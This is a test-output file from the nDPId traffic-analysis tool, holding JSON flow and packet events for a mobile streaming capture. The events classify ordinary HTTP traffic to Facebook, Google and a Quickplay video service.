-00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} -00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} -02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYxMDNkNTU4OTU2YWQwYWY2YTU2Mw=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4